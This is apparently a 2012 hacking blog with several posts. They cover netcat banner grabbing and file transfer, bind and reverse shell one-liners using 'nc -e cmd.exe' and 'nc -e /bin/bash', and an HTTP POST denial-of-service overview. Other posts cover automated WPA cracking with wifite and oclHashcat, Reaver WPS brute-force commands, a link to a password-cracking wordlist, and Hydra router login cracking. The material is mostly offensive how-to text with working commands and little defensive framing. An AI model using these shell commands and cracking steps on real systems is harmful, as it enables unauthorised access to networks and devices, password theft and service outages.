Freitag, 27. Januar 2012

Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver



Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities

Although NetCat is not the state of the art tool anymore and it sends all packets uncrypted through the net, it´s still a very good tool for easy banner grabbing, binding shells or reverse shells.

Banner Grabbing Commandline:

nc -v 192.168.0.200 21

nslookup -querytype=mx debian.org
nc -v xxx.debian.org 25

nslookup -querytype=mx dell.com
nc -v xxx.dell.com 25

nc -v 192.168.0.200 80
GET / HTTP/1.1

nc -v www.dell.com 80
GET / HTTP/1.1

nc -v 192.168.0.200 21


Weberserver Commandline:


while true; do nc -l -p 80 -q 1 < bla.html; done


File Transfer Commandline:


windows maschine file server nc -lvp 4444 > captured.txt
linux maschine: nc -v target-ip < info.txt this cmd will send the content of the file INFO.TXT to the Server into the file CAPTURED.TXT

Shell Commandlines:


Bind Shell

windows maschine: nc -lvp 4444 -e cmd.exe
linux maschine: nc -v 192.168.0.200 4444

Connecting from the linux system to the windows system,
which isn´t located behind a NAT System.

Reverse Shell

windows maschine: nc -lvp 4444
linux maschine: nc -nv 192.168.0.200 4444 -e /bin/bash
/sbin/ifconfig

Sending a /bin/bash Shell from a Linux system behind a NAT to the
windows system, which is listening on port 4444. traversing NAT.

Dienstag, 24. Januar 2012

Owasp HTTP POST DoS Apache Webserver Attack



This Tutorials shows, how you can easily take out an Apache Webserver with one HTTP POST Tool using a std. slow DSL Connection.

This is NO Slowloris Attack!


Limitations of HTTP GET DDOS attack:

- Does not work on IIS web servers or web
servers with timeout limits for HTTP headers.

- Easily defensible using popular load balancers,
such as F5 and Cisco, reverse proxies and
certain Apache modules, such as mod_antiloris.

- Anti-DDOS systems may use "delayed
binding"/"TCP Splicing" to defend against HTTP
GET attacks.

Why HTTP POST DDOS attack works

- This attack can evade Layer 4 detection
techniques as there is no malformed TCP, just
like Slowloris.

- Unlike Slowloris, there is no delay in sending
HTTP Header, hence nullifying IIS built-in
defense, making IIS vulnerable too.

- Size, character sets and time intervals can be
randomised to foil any recognition of Layer 7
traffic patterns by DDOS protection systems.

- Difficult to differentiate from legit connections
which are slow

Montag, 23. Januar 2012

Fully Automated Mass WPA / WEP Hacker with Wifite ( wifite.py ) and cracking key with oclHashcat



Fully Automated Mass WPA / WEP Hacking with Wifite ( wifite.py )
converting the .cap File and resolving the WPA Key with oclHashcat-64


In this Tutorial you learn how to Capture a WPA2 Handshake with a GUI Powered Tool ( wifite.py );
later we upload the capture file to http://hashcat.net/cap2hccap/ to generate a .hccap file which we will crack with oclHashCat-64.


Some Informations about the Tools:

Wifite:


This project is available in French: all thanks goto Matt² for his excellent translation!
sorts targets by power (in dB); cracks closest access points first
automatically deauths clients of hidden networks to decloak SSIDs
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc)
"anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
all WPA handshakes are backed up to wifite.py's current directory
smart WPA deauthentication -- cycles between all clients and broadcast deauths
stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit
switching WEP attack methods does not reset IVs
intel 4965 chipset fake-authentication support; uses wpa_supplicant workaround
SKA support (untested)
displays session summary at exit; shows any cracked keys
all passwords saved to log.txt
built-in updater: ./wifite.py -upgrade

Requirements

linux operating system (confirmed working on Ubuntu 8.10 (BT4R1), Ubuntu 10.04.1)
tested working with python 2.4.5 and python 2.5.2; might be compatible with other versions,
wireless drivers patched for monitor mode and injection: backtrack4 has many pre-patched drivers,
aircrack-ng (v1.1) suite: available via apt: apt-get install aircrack-ng or by clicking here,
xterm, python-tk module: required for GUI, available via apt: apt-get install python-tk
macchanger: also available via apt: apt-get install macchanger
pyrit: not required, optionally strips wpa handshake from .cap files

oclHashcat-plus

Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker
Worlds first and only GPGPU based rule engine
Free
Multi-GPU (up to 16 gpus)
Multi-Hash (up to 24 million hashes)
Multi-OS (Linux & Windows native binaries)
Multi-Platform (OpenCL & CUDA support)
Multi-Algo (see below)
Low resource utilization, you can still watch movies or play games while cracking
Focuses highly iterated, modern hashes
Focuses single dictionary based attacks
Supports pause / resume while cracking
Supports reading words from file
Supports reading words from stdin
Integrated thermal watchdog
20+ Algorithms implemented with performance in mind

If you have any question, leave a note.



Samstag, 21. Januar 2012

Reaver 1.4 WPS Bruteforcing Tool - Upgrade/Installation/Usage



Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

Prerequisites

You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

Then Start ./wash -i mon0 to scan for valid Wifis.

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Dienstag, 17. Januar 2012

Samstag, 7. Januar 2012

UPDATE: The BEST Dictionaries & Wordlist for WPA Cracking



This is a 18 in 1 WPA Edition Password List, its not only a combination of Passwords:

  • Merged each 'collection' into one file (minus the 'readmes' files)
  • Removed leading & trailing spaces & tabs
  • Converted all 'new lines' to 'Unix' format
  • Removed non-printable characters
  • Removed HTML tags (Complete and common incomplete tags)
  • Removed (common domains) email addresses
  • Removed duplicate entries
  • How much would be used if they were for 'cracking WPA' (Between 8-63 characters)

All the Credits for the work go to g0tmi1k !!! Visit his Site for closer Informations !




Download Full 18in1 cleaned Password List:
Compressed 4,8GB ( 24 Files, 7-Zip ) / Extracted 39,1GB ( 1 File, .lst )

UPDATE FROM: 07.08.2012

https://app.dumptruck.goldenfrog.com/p/O10ZURAU91

Use this Download Link ONLY!

Password: maurisdump.blogspot.com


This Collection was used to create the 18in1 WPA Edition:

http://www.skullsecurity.org/wiki/index.php/Passwords
http://trac.kismac-ng.org/wiki/wordlists
http://hashcrack.blogspot.com/p/wordlist-downloads_29.html
http://packetstormsecurity.org/Crackers/wordlists/
http://0x80.org/wordlist/
http://dictionary-thesaurus.com/wordlists.html
http://www.outpost9.com/files/WordLists.html
http://www.openwall.com/passwords/wordlists/
http://dictionary-thesaurus.com/Wordlists.html
http://en.wikipedia.org/wiki/Wikipedia_database
http://blog.sebastien.raveau.name/2009/03/cracking-passwords-with-wikipedia.html
http://www.isdpodcast.com/resources/62k-common-passwords/

Montag, 2. Januar 2012

Router Hacking with Hydra - Very Fast





Update: New Video Version


In this short video you can see how effectiv hydra/xhydra works with a passwordlist against routers,
weblogins and other authentication forms.

THC-Hydra - the best parallized login hacker:

  • Samba, FTP, POP3,
  • IMAP, Telnet, HTTP Auth,
  • LDAP,NNTP, MySQL, VNC,
  • ICQ, Socks5, PCNFS,
  • Cisco and more. Includes SSL support and is part of Nessus.